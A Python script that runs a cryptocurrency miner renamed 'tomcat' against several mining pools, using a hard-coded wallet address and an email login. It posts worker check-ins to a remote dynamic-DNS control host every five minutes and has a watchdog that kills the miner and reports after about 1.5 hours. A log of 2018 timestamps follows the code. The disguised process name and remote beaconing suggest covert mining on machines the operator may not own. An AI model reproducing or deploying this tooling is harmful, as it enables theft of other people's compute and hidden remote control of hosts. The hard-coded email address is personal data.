import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:11:01.341790
#2018-02-17 16:59:07.013974
#2018-02-17 18:47:06.208420
#2018-02-17 20:35:07.059636
#2018-02-17 22:21:06.926731
#2018-02-18 00:06:06.593007
#2018-02-18 01:57:01.619756
#2018-02-18 03:45:02.422846
#2018-02-18 05:32:05.497536
#2018-02-18 07:24:06.470064
#2018-02-18 09:12:07.502137
#2018-02-18 10:58:04.583341
#2018-02-18 12:45:08.632518
#2018-02-18 14:33:07.131944
#2018-02-18 16:23:06.528109
#2018-02-18 18:12:07.620525
#2018-02-18 19:59:05.953253
#2018-02-18 21:47:03.704205
#2018-02-18 23:35:08.068257
#2018-02-19 01:21:06.055304
#2018-02-19 03:09:06.823325
#2018-02-19 04:54:03.843210
#2018-02-19 06:38:04.915939
#2018-02-19 08:27:04.562418
#2018-02-19 10:16:05.145954
#2018-02-19 12:03:08.908970
#2018-02-19 13:50:05.352585
#2018-02-19 15:39:01.908494
#2018-02-19 17:25:07.208167
#2018-02-19 19:12:09.359209
#2018-02-19 20:59:06.287322
#2018-02-19 22:47:05.023778
#2018-02-20 00:30:01.748743
#2018-02-20 02:18:08.368378
#2018-02-20 04:10:08.094383
#2018-02-20 05:53:01.395045
#2018-02-20 07:38:08.210418
#2018-02-20 09:23:07.469158
#2018-02-20 11:07:01.643865
#2018-02-20 12:53:10.254451
#2018-02-20 14:37:05.639748
#2018-02-20 16:23:05.413661
#2018-02-20 18:10:01.434537
#2018-02-20 20:02:01.751678
#2018-02-20 21:48:07.621908
#2018-02-20 23:30:10.567447
#2018-02-21 01:14:07.238980
#2018-02-21 03:03:01.566244
#2018-02-21 04:50:09.372399
#2018-02-21 06:38:05.716424
#2018-02-21 08:24:01.982356
#2018-02-21 10:11:04.575593
#2018-02-21 11:59:06.073462
#2018-02-21 13:49:01.760524
#2018-02-21 15:26:10.336008
#2018-02-21 17:18:08.967452
#2018-02-21 19:07:06.910844
#2018-02-21 20:53:07.054568
#2018-02-21 22:39:06.317006
#2018-02-22 00:28:08.220769
#2018-02-22 02:18:04.131313
#2018-02-22 04:04:02.164020
#2018-02-22 05:50:07.718861
#2018-02-22 07:35:09.732264
#2018-02-22 09:24:04.732908
#2018-02-22 11:10:01.266647
#2018-02-22 12:57:07.140071
#2018-02-22 14:45:10.410480
#2018-02-22 16:29:04.933463
#2018-02-22 18:15:02.982151
#2018-02-22 20:04:06.355830
#2018-02-22 21:53:06.926867
#2018-02-22 23:42:05.307046
#2018-02-23 01:29:07.742976
#2018-02-23 03:17:05.301600
#2018-02-23 05:03:03.969412
#2018-02-23 06:49:01.400945
#2018-02-23 08:39:04.140629
#2018-02-23 10:54:09.070360
#2018-02-23 12:51:11.804058
#2018-02-23 14:36:06.387663
#2018-02-23 16:25:11.843639
#2018-02-23 18:13:06.024218
#2018-02-23 19:59:07.546550
#2018-02-23 21:42:05.618629
#2018-02-23 23:34:06.278142
#2018-02-24 01:24:02.028233
#2018-02-24 03:14:05.790491
#2018-02-24 04:59:03.683241
#2018-02-24 06:46:07.565438
#2018-02-24 08:39:05.258310
#2018-02-24 10:23:06.008401
#2018-02-24 12:18:03.917144
#2018-02-24 14:11:02.163053
#2018-02-24 15:57:07.461470
#2018-02-24 17:51:05.125190
#2018-02-24 19:38:07.006742
#2018-02-24 21:25:07.950660
#2018-02-25 00:06:06.268685
#2018-02-25 04:18:03.924402
#2018-02-25 07:48:04.644497